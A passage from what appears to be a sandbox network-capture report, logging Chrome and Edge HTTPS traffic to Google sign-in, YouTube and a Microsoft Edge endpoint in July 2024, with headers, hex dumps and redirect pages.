Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-26 15:57:13 UTC	23	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2024-07-26 15:57:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	61199	142.251.168.84	443	7084	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:14 UTC	1246	OUT	GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en HTTP/1.1 Host: accounts.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmation sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 15:57:14 UTC	2077	IN	HTTP/1.1 302 Found Content-Type: application/binary Set-Cookie: __Host-GAPS=1:w4RW8X79OLP1lhTG5U-kYT8yZKnSNw:3U3fE25Sj1rlD-N2; Expires=Sun, 26-Jul-2026 15:57:14 GMT; Path=/; Secure; HttpOnly; Priority=HIGH Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:14 GMT Location: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76c0xx2-tCl3huF6R_uGDdkvCx33lS6VkP03GMJYqycbKU88ilI9jnwvjjmkhmcj4FKFUKtFA Strict-Transport-Security: max-age=31536000; includeSubDomains Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-ffexdrF7NYE6wuxj1-B1Og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsSigninPassiveLoginHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: unsafe-none Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	61204	142.251.168.84	443	7084	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:15 UTC	1688	OUT	GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76c0xx2-tCl3huF6R_uGDdkvCx33lS6VkP03GMJYqycbKU88ilI9jnwvjjmkhmcj4FKFUKtFA HTTP/1.1 Host: accounts.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmation sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __Host-GAPS=1:w4RW8X79OLP1lhTG5U-kYT8yZKnSNw:3U3fE25Sj1rlD-N2
2024-07-26 15:57:15 UTC	1574	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Set-Cookie: __Host-GAPS=1:yI_OEUMu7IGbnCDihcwlWJkLhxv6TQ:XPid9P2CWoLMw6di;Path=/;Expires=Sun, 26-Jul-2026 15:57:15 GMT;Secure;HttpOnly;Priority=HIGH X-Frame-Options: DENY Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:15 GMT Location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76ACXN3GLzFgo4vjAm8qgvaycSbBf1NyhfiU3jRSTe8QWkjhjdrOWS7DzX4mFMwn9Z_r8QQzQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S86286635%3A1722009435752789&ddm=0 Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-6Mgn-BZxdEt78hMI9et0MA' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk" Content-Length: 693 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 15:57:15 UTC	693	IN	Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 76 33 2f 73 69 67 6e 69 6e 2f 69 64 65 6e 74 69 66 69 65 72 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 Data Ascii: <HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Temporarily</H1>The document has moved <A HREF="https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fww

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	61202	142.250.185.110	443	7736	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:15 UTC	666	OUT	GET /account HTTP/1.1 Host: www.youtube.com Connection: keep-alive sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 15:57:16 UTC	2574	IN	HTTP/1.1 303 See Other Content-Type: application/binary X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:15 GMT Location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB Strict-Transport-Security: max-age=31536000 X-Frame-Options: SAMEORIGIN Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]} Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="youtube_main" Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: require-trusted-types-for 'script';report-uri /cspreport P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en-GB for more info." Server: ESF Content-Length: 0 X-XSS-Protection: 0 Set-Cookie: GPS=1; Domain=.youtube.com; Expires=Fri, 26-Jul-2024 16:27:15 GMT; Path=/; Secure; HttpOnly Set-Cookie: YSC=Bi0DJIXSUHo; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Set-Cookie: VISITOR_INFO1_LIVE=DcAqKmorkGA; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 15:57:15 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgbA%3D%3D; Domain=.youtube.com; Expires=Wed, 22-Jan-2025 15:57:15 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	61212	52.153.155.231	443	7736	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:15 UTC	428	OUT	GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 Host: api.edgeoffer.microsoft.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	61217	142.251.168.84	443	7084	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:57:17 UTC	1787	OUT	GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76ACXN3GLzFgo4vjAm8qgvaycSbBf1NyhfiU3jRSTe8QWkjhjdrOWS7DzX4mFMwn9Z_r8QQzQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S86286635%3A1722009435752789&ddm=0 HTTP/1.1 Host: accounts.google.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmation sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __Host-GAPS=1:yI_OEUMu7IGbnCDihcwlWJkLhxv6TQ:XPid9P2CWoLMw6di
2024-07-26 15:57:17 UTC	4232	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: DENY Set-Cookie: __Host-GAPS=1:mnTdAH7fEkBLkeZplmTecE3mxQbzzA:djDhTMlYpTEFMKo_; Expires=Sun, 26-Jul-2026 15:57:17 GMT; Path=/; Secure; HttpOnly; Priority=HIGH x-auto-login: realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%2526feature%253Dredirect_login x-ua-compatible: IE=edge Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:57:17 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Resource-Policy: same-site Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi" Content-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-f0EFYeo5hh84rCX6rDPnVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com https://support.google.com/inapp/ https://www.google.com/tools/feedback/ https://www.gstatic.com/inproduct_help/ https://www.gstatic.com/support/content/ https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/main_light_binary.js https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/uservoice/surveys/resources/prod/js/survey/ https://www.gstatic.com/feedback/js/ghelp/;report-uri /v3/signin/_/AccountsSi [TRUNCATED] Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]} Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://www.google.com/tools/feedback/load.js https://www.google.com/tools/feedback/open.js https://www.gstatic.com/inproduct_help/service/lazy.min.js https://www.gstatic.com/inproduct_help/api/main.min.js https://www.gstatic.com/inproduct_help/chatsupport/chatsupport_button_v2.js https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js https://www.gstatic.com/uservoice/feedback/client/web/live/main_light_binary.js https://www.google.com/tools/feedback/chat_load.js https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.5_pF0xwhc8s.es5.O/;report-uri /v3/signin/_/AccountsSignInUi/cspreport/fine-allowlist reporting-endpoints: default="/v3/signin/_/AccountsSignInUi/web-reports?context=eJzjesOoxSXF4KUhxbBHaReTY-wTJlcgXv7-KdNqII5Z9YwpAYgPxj1nOgrEeeeeMxUB8duEF0wfgbi19QVTJxBv7nnBtB2Ip_G8ZJoFxEe2v2Q6AcQSX18yqQGx_K_prMpA7JQ-gzUAiH3qZ7BGAXHrzXOsk4E4Pu48azIQXzt-nvUWECf9O89aAMQ7RS6w7gXiWRYXWOcB8ZKIi6wZCRdZc4D4QOJF1k8FF1m_ATHjl4usrEBs-v8iqyUQOwCxCxAbKlxitQfiOXsusS4AYiFujrt9_VvZBB70bYhS0k_KL4zPTEnNK8ksqUwrys8rSc1LSSwtySjNLE4tKkstijcyMDIxMDcy1jMwiC8wAAAXJ4Ws" Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-26 15:57:17 UTC	4232	IN	Data Raw: 31 63 39 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 76 33 2f 73 69 67 6e 69 6e 2f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 66 30 45 46 59 65 6f 35 68 68 38 34 72 43 58 36 72 44 50 6e 56 77 22 3e 77 69 6e 64 6f 77 2e 57 49 5a Data Ascii: 1c96<!doctype html><html lang="en" dir="ltr"><head><base href="https://accounts.google.com/v3/signin/"><link rel="preconnect" href="//www.gstatic.com"><meta name="referrer" content="origin"><script data-id="_gd" nonce="f0EFYeo5hh84rCX6rDPnVw">window.WIZ
2024-07-26 15:57:17 UTC	3094	IN	Data Raw: 63 6f 6d 25 32 35 32 46 61 63 63 6f 75 6e 74 25 32 36 66 65 61 74 75 72 65 25 33 44 72 65 64 69 72 65 63 74 5f 6c 6f 67 69 6e 5c 5c 75 30 30 32 36 68 6c 5c 5c 75 30 30 33 64 65 6e 5c 5c 75 30 30 32 36 73 65 72 76 69 63 65 5c 5c 75 30 30 33 64 79 6f 75 74 75 62 65 5c 22 5d 2c 6e 75 6c 6c 2c 5b 5b 5c 22 2f 72 65 73 74 61 72 74 5c 22 2c 6e 75 6c 6c 2c 5b 5c 22 54 4c 5c 22 2c 5c 22 63 68 65 63 6b 43 6f 6e 6e 65 63 74 69 6f 6e 5c 22 5d 5d 5d 5d 2c 6e 75 6c 6c 2c 74 72 75 65 2c 5b 5d 2c 6e 75 6c 6c 2c 74 72 75 65 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 22 2c 22 6d 4a 52 37 6a 66 22 3a 66 61 6c 73 65 2c 22 6e 51 79 41 45 22 3a 7b 22 52 6e 41 55 46 66 22 3a 22 66 61 6c 73 65 22 2c 22 59 55 4f 32 4d 65 22 3a 22 66 61 6c 73 65 22 2c 22 4c 65 55 55 34 62 Data Ascii: com%252Faccount%26feature%3Dredirect_login\\u0026hl\\u003den\\u0026service\\u003dyoutube\"],null,[[\"/restart\",null,[\"TL\",\"checkConnection\"]]]],null,true,[],null,true,true,false,true]","mJR7jf":false,"nQyAE":{"RnAUFf":"false","YUO2Me":"false","LeUU4b
2024-07-26 15:57:17 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 3c 73 74 79 6c 65 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 5f 2f 6d 73 73 2f 62 6f 71 2d 69 64 65 6e 74 69 74 79 2f 5f 2f 73 73 2f 6b 3d 62 6f 71 2d 69 64 65 6e 74 69 74 79 2e 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 2e 6c 2d 77 44 69 52 64 6b 44 37 77 2e 4c 2e 42 31 2e 4f 2f 61 6d 3d 42 42 30 4d 59 58 51 61 67 55 41 38 6e 41 4d 39 51 43 6b 51 4d 67 41 41 41 41 41 41 41 41 41 41 61 41 4d 41 41 4a 67 42 2f 64 3d 31 2f 65 64 3d 31 2f 72 73 3d 41 4f 61 45 6d 6c 46 6b 53 74 44 37 79 31 76 44 5f 54 5a 48 4f 78 7a 70 2d 4e 32 4d 45 55 4c 59 52 51 2f 6d 3d 69 64 65 6e 74 69 66 69 65 72 76 69 65 77 2c 5f 62 2c 5f 74 70 22 20 6e 6f 6e 63 65 3d 22 33 64 35 6a 51 61 64 64 76 Data Ascii: 8000<style data-href="https://www.gstatic.com/_/mss/boq-identity/_/ss/k=boq-identity.AccountsSignInUi.l-wDiRdkD7w.L.B1.O/am=BB0MYXQagUA8nAM9QCkQMgAAAAAAAAAAaAMAAJgB/d=1/ed=1/rs=AOaEmlFkStD7y1vD_TZHOxzp-N2MEULYRQ/m=identifierview,_b,_tp" nonce="3d5jQaddv
2024-07-26 15:57:17 UTC	1390	IN	Data Raw: 50 78 41 65 62 20 2e 4a 51 35 74 6c 62 7b 66 6c 65 78 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 32 38 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 32 70 78 3b 77 69 64 74 68 3a 32 38 70 78 7d 2e 6c 50 78 41 65 62 20 2e 4c 62 4f 64 75 63 2c 2e 56 55 66 48 59 64 20 2e 4c 62 4f 64 75 63 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6c 50 78 41 65 62 20 2e 4c 62 4f 64 75 63 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 48 37 36 65 50 63 20 2e 4a 51 35 74 6c 62 7b 68 65 69 67 68 74 3a 36 34 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 38 70 78 3b 77 69 64 74 68 3a 36 34 70 78 7d 2e 4d 6e 46 6c 75 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 64 69 73 70 6c Data Ascii: PxAeb .JQ5tlb{flex:none;height:28px;margin-right:12px;width:28px}.lPxAeb .LbOduc,.VUfHYd .LbOduc{display:flex;align-items:center}.lPxAeb .LbOduc{justify-content:center}.H76ePc .JQ5tlb{height:64px;margin:0 auto 8px;width:64px}.MnFlu{border-radius:50%;displ
